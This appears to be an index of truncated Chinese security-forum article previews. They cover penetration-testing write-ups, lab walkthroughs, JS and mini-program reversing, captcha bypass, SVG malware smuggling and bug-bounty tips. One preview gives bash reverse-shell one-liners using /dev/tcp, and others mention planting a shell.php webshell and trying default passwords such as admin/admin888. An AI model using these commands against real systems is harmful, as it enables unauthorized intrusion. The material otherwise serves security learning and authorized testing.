url重定向奇淫技巧 漏洞原理 Url重定向是程序员误信了攻击者的输入而将网站重定向到另一个站点,这通常通过url参数、HTML<meta>刷新标签、DOM中的window对象的location属性来实现的 很多Web 网站都是通过在原始 URL 的参数中设置目标 URL 来有意实现用户访问的重定向的。应用程序通过使用这个参数来告诉浏览器向目标 URL 发送一个GET请求,,例如,假定
【那些年-有趣的开发兄弟】如此验证? 起因:发现如下页面,想着随手点两下获取短信验证码,看看有没有短信炸弹,结果一看有图形验证码,不过无所谓做对抗就好了,于是就想找到图形验证码的请求包 结果,点、点、点,什么包都没有?这是什么情况 先手动发一下,看一下发送短信验证码的请求,参数如下,确实看到了4177,不过这个验证码它是怎么验证的呢?难道是无效的,我改了一下然后发包回显验证码错误,不过正常的图
环境地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境怎么配置的这个互联网上去查吧,可以参考最后一节的参考文献。 web渗透 netdiscover -r 192.168.1.0/24 发现主机 nmap -sS -sV -Pn 192.168.1.130 扫描端口开放情况 开放80,3389,3306端口 访问80端口发现ph
记一次小程序逆向 遇到瓶颈了,不知道该干什么,突然想到学校的小程序 闲来无事就看一看[doge] 抓包下来的数据是这样的,嗯,下机(hhh 一、反编译程序 加密嘛,之前抓了看到是加密就放弃了,现在重新弄一弄 https://github.com/wux1an/wxapkg 用这个工具反编译本地微信小程序 于是乎拿到js源码看一看 二、AES加密 找到一些信息 AES加密,CBC模式,key和
原文链接:https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/ 可拓展向量图形文件或者叫SVG 文件,已成为恶意软件传递的高级策略所用的图形文件,使用方式随着时间的推移而发生了巨大变化。2022 年 5 月发布了用于投递嵌入在 HTML 或 SVG 代码中的恶意文件的程序 AutoSmuggle ,使用 SVG 文件投递恶
环境搭建: 排错: 在搭建过程中发现报错,删除这部分内容就成功解决。 信息收集 端口扫描 使用namp -sn 探测存活IP 接着去查看服务 web服务 然后发现80端口。访问 发现有管理员接口,并泄露了默认用户名和密码。 弱口令登录 使用弱口令登录,成功进入后台。 在编辑模板的地方,我们新增一个shell.php 文件写入漏洞 文件写在了:/yxcms/protected/apps/
简介 最近在渗透过程中,多次碰到请求数据加密或者加签名的情况,说实话碰到这种就有点怯战,为了彻底解决这个问题,学习了js逆向相关的知识,找了个有签名的网站进行实战。 是一个这样的功能点:根据输入的用户名获取手机号,请求包如下: 可以看到总共有4个参数:ver、mt、username和sign,当我改变ver、mt、username三个中的任意一个值时,服务器都会返回签名错误,初步判断sign是
前段时间edu上出现了两个网安总队收取安全情报,不收漏洞,下面简单分析一下如何挖掘安全情报。 在发现在edu中新增了两个网安总队收安全情报等漏洞,那威胁情报又会包含哪些内容呢?以前或许会看到各种ss网站、bc网站、yx网站满天飞,那么他们又是如何发生的呢? 在收集过程中,发现很多都是证书过期、DNS解析存在问题,基本上一个主域名下的子域名都会被跳转到不同的恶意网站中。 那我们基本了解一下证书过期
登陆口界面能做的操作 短信轰炸、任意注册、验证码(登陆/注册//找回)/密码爆破、验证码相关、nday、弱口令、ddos、注入、枚举、越权、二维码劫持、js、url、返回包、信息泄露、rce、xss、sql注入 弱口令 标准的某某系统后台,而且暴露出用户手册 第一:就是弱口令操作:admin/admin admin/123456 admin/admin888这样的,最 好的方法就是自己积累一个常
反弹shell汇总 文章旨意在于总结各类反弹shell,有不足或漏缺请各位是否指出. 注意有些反弹shell的方法或脚本只适用于Linux或者Windows,注意区分相关脚本的编写方式方法。 bash bash -i >& /dev/[tcp|udp]/[host]/[port] 0>&1 /bin/bash -i > /dev/[tcp/udp]/[host]
记一次Edu挖掘 平时不怎么爱挖src,因此除了项目需要之外(基本全部都是企业的网站),业余几乎不会抽时间去挖挖各大众测平台的src,还没有挖过类似于学校edu这一类的src,于是就想着玩一下,看看有什么区别。 目标定夺 首先是目标的问题,一般对于网站的一些首页,内容太多,所以打起来会比较墨迹,因此这次目标定在了某个学校的智慧校园后台,一般这一类的后台管理系统都会存在类似于弱口令、登录绕过等各种问
src挖洞技术分享 src推荐刚入门的新手首选公益src如漏洞盒子、补天src,因为漏洞盒子收录范围广,只要是国内的站点都收入,相比其它src平台挖掘难度非常适合新手。后续可以尝试先从一些小的src厂商入手。 首先是熟能生巧,我一开始挖洞的时候,是先从教育edusrc,cnvd平台进行挖掘漏洞,但这种打法如果放到src,我打的很吃力,因为前者基本都是拿网上公开的nday打,而后者全是技巧和思路。
记一次为数不多但还算有点收获的一次实战(平时摸鱼来着...),大致任务是对某某市某*院进行次漏洞收集和外网资产梳理且是有授权的(其实是甲方不大清楚自己外网有多少资产),漏洞质量要求还挺高。emmm本来是打算摸鱼来着的 言归正传,先从信息收集开始,查备案找到四个域名,批量丢到鹰图看一看资产,顺便灯塔也跑一跑(灯塔这里不放了,上面东西蛮多的)。 子域名、扫扫目录,收集大概就这些了,子域名收集到
前言 做项目喜闻乐见的获取了bin.rar,当时快速过了config交了数据库权限,然后看代码发现mobileController下方法未授权,交了一些信息泄露,大部分是人员手机相关。项目结束后想交cnvd,写了个nuclei跑了一下结果没几个,当时大为不解,但是感谢他们部署系统的好习惯,顺手测了另两个站的bin.rar,嘿嘿。dnspy导出到vs里,记录一下发现的漏洞。 最后发现最开始漏洞少的原
前言 一次有趣的密码加密爆破分享,仅供学习参考,如需转载请声明原文链接 寻找登录加密点 首先按住ctrl+shift+i打开开发者调试界面 然后找到网络页面,随便输入账号密码提交一次 查看启动器,直接点击蓝色的链接转到密码登录处 分析js代码 可以看到FinishLogin将curItem转到doStart()方法中,dostart()方法发送了一个get请求 api/source/